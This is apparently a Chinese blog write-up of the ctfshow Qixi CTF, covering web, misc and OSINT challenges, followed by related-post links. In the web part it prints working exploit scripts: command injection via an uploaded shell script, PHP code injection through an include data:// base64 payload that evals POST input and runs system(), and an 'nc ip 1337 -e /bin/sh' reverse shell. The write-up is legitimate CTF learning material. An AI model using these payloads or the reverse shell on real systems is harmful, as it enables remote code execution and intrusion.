ctfshow 七夕杯

最新推荐文章于 2025-03-24 22:04:41 发布
原创 最新推荐文章于 2025-03-24 22:04:41 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #服务器 #apache

WEB签到 easy_calceasy_cmdMISC签到lsb海盗的密码OSINT

WEB

签到

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://48bb5eb8-ca0e-4a11-8438-4a06cf2f1471.challenge.ctf.show/"
​
​
def getShell(payload):
    data={
    "cmd":payload
    }
    file = {
    "file":b"#!/bin/sh\ncat /f*>/var/www/html/1.txt"
    }
    response = requests.post(url=url+"api/tools.php",files=file,data=data)
    if "t*" in response.text:
        print("执行成功,检查回显...")
    response = requests.get(url=url+"1.txt")
    if response.status_code == 200:
        print("flag 获取成功 "+response.text)
    else:
        print("flag 获取失败")
​
​
def run():
    getShell(". /t*/*")
​
def main():
    run()
    
if __name__ == '__main__':
    main()

easy_calc

官方wp写的很清楚 Docs

从题目代码来看,是输入3个值,分别是num1、符号值、num2

然后过滤了一大堆符号,这种就是最直接的提示,没过滤哪个,就用哪个

然后把3个值拼接起来进行执行

既然是eval就是代码执行,但是又不能用括号,那么只能用不用括号的函数了,那么答案很显然 ,php中不需要括号使用的函数,叫做语言结构,常见的有include、require、echo

使用include来执行代码,那么显而易见,肯定要用到伪协议

我们只需要构造出一个data的伪协议看看

正常的伪协议包含是这样的

include "data://text/plain,<?php phpinfo();?>"

但是<和()不能使用,所以需要编码 使用data协议的第二种写法

include "data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+"
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
url = "http://fc4f95dd-c44d-45ed-8557-c1a4fa9697e9.challenge.ctf.show/"
​
def getFlag():
        data={
            "num1":'include "data://text',
            "symbol":"/",
            "num2":'plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+";',
            "1":"system('cat /secret');"
        }
        response=requests.post(url=url,data=data)
        print(response.text)
​
if __name__ == '__main__':
        getFlag()
​

easy_cmd

nc ip 1337 -e /bin/sh

MISC

签到

 

lsb

看到颠倒了 ,用python倒回来

with open('zip','rb') as f:
    content=f.read()
with open('1.zip','wb') as w:
    w.write(content[::-1])
​

然后解压出来图片末尾有ctfshow 推测是密码

 

🌊☺🌪☂👣☃🚫🚹⏩🤣✅🎈☂👣⌨🌊😁🎤❓⌨🍎🎃😆🌊🌊🐎🎃👌☀🍎🍵🍵😀☀😂🍎❓☀🚰🔄👌🏎📂🔬🎤👑👑😇🗒🍴😁🚫🚫🌪😍⌨🐅💧🍴😇🏎😀🚨🚨

emoji-aes

key 为ctfshow 偏移量为2

 

海盗的密码

根据题目用ip地址做密码,百度索马里的ip地址爆破 索马里IP大全 索马里IP地址列表 索马里IP段下载 2022-08-15

一个个去尝试 其实也挺快的 主要是自己换掩码浪费时间

 

OSINT

直接百度搜图,点开各种链接 自己找

Fnylad
关注
ctfshow七夕2022(re)
weixin_49764009的博客
08-07 835
因为算法逻辑很清楚就是单纯让v5去累加v7而且每次累加的结果赋值给v10。这里需要注意v5的值等于我们输入的字符(v4)去异或0x77。虽然出题人给了md5值但是明显直接去解md5不是出题人的本意。这题是学弟给的思路 贴上学弟的python的脚本。而v10数组的第一个字符就等于我们输入的v4。直接把算法抠出来解密就行了。但我们需要求出v10的值。......
ctfshow七夕web
m0_68074153的博客
08-06 2338
限制长度命令执行,php伪协议,反弹shell
ctfshow 七夕(复现)
as you know, nlp is fantasitc!
08-07 2008
最终执行命令的语句是 $num1$symbol$num2 拼接起来的,而且过滤()不能调用函数,所以根据语言结构是 include、require、echo这种语句,试着去包含文件。这个题可以理解为注入,在整个计算语句中注入我们想要执行的命令语句,只不过是过滤()之后不能调用函数执行。我开始这样做了,但是最后并没有做出来的原因是:我一直在网站根目录下看有没有生成文件,实际上这条命令执行在api这个目录下,生成的文件也在这个目录下,所以需要到/api这个目录下去寻找是否生成文件。,尝试别的地方,发现。...
CTFSHOW-七夕
y2xsec的博客
12-04 308
看汇编就可以看到字符串,小端序倒序一下转字符串就解得了。
ctfshow七夕
qq_45705626的博客
08-06 421
ctfshow七夕
ctfshow七夕复现
qq_63928796的博客
08-08 943
得到一个ctfshow,题目说是lsb,猜测是lsb加密隐写,ctfshow为key解密得到。既然是eval就是代码执行,但是又不能用括号,那么只能用不用括号的函数了,那么答案很显然。那么思路有了,要使用include来执行代码,那么显而易见,肯定要用到。然后过滤了一大堆符号,这种就是最直接的提示,没过滤哪个,就用哪个。从题目代码来看,是输入3个值,分别是num1、符合值、num2。但是呢,题目不能用括号和< 随意需要对执行的代码进行编码。得到一个没有后缀的文件,放到010查看。正常的伪协议包含是这样的。.
ctfshow web学习记录
m0_64815693的博客
09-25 2978
ctfshow 学习记录
ctfshow-web【七夕
记录学习,一起进步
05-10 520
ctfshow-web【七夕
ctfshow web七夕
2301_81040377的博客
06-17 739
执行命令没有回显,我们直接写文件就可以了。命令但是不能使用带参数的命令。然后监听端口进行rce即可。那么我们就反弹shell。进行转义之后就会进行。
CTFshow - 七夕复现
Pai_Space
10-24 1004
CTFshow 七夕
CTFSHOW七夕web
羽的博客
08-05 2225
CTFSHOW 七夕web
ctfshow七夕web签到wp
arcuied
12-29 425
ctfshow七夕web签到wp
ctfshow[七夕]sweetheart
weixin_51055545的博客
08-06 703
限制了申请数量(10个)和申请的大小(0x400),将申请的堆指针放在heap_list + 3 * i 的地址里,程序会在申请一个0x10大小的堆块,用来存放名字,也就是堆块的index,这里读取字符用的是自己写的一个函数readn(),​ 下班回到酒店看到ctfshow七夕的比赛,就来玩一玩,只有一道pwn,dreamcat师傅出的2.27的一道堆题,题目还是很有趣的,题目结合真实情景,疯狂星期四v我50!bk(),show()都是常规的释放操作和显示操作,重点看new_one()和buy()函数,.
ctfshow REVERSE re2 萌新赛 内部赛 七夕 WP
最新发布
2301_80313926的博客
03-24 1050
re2 萌新赛 flag白给 签退 数学不及格  内部赛 批量生产的伪劣产品  来一个派森  好好学习 天天向上  屏幕裂开了 七夕 逆向签到  easy_magic 
【Web】CTFSHOW 七夕 题解
uuzeray的博客
05-10 716
一眼命令拼接,先fuzz一下可以用的字符。过滤了括号,不难想到用include。也可以打临时文件RCE。直接nginx日志包含。直接nc反弹shell。
七夕 密码签到20230910ctfshow
学习,再学习
09-10 267
大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗?已知密文由两部分组成,后面的推测为秘钥。后面是密钥,先看一下长度。
七夕—密码签到
HAI_WD的博客
07-17 500
拿到这道题之后,就会发现,无论你是想要使用哪一种对称加密都没有办法进行解密,没有提示,没有思路,基本纯纯的考脑洞,而且这种脑洞还比较小众,当然也算是一种加密方式吧。然后再base64一下。
ctfshow web 月饼
qq_47168481的博客
10-31 2404
web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->password==='yu
ctfshow Lucky7
08-31
- *1* *2* *3* [ctfshow七夕2022(re)](https://blog.youkuaiyun.com/weixin_49764009/article/details/126217140)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值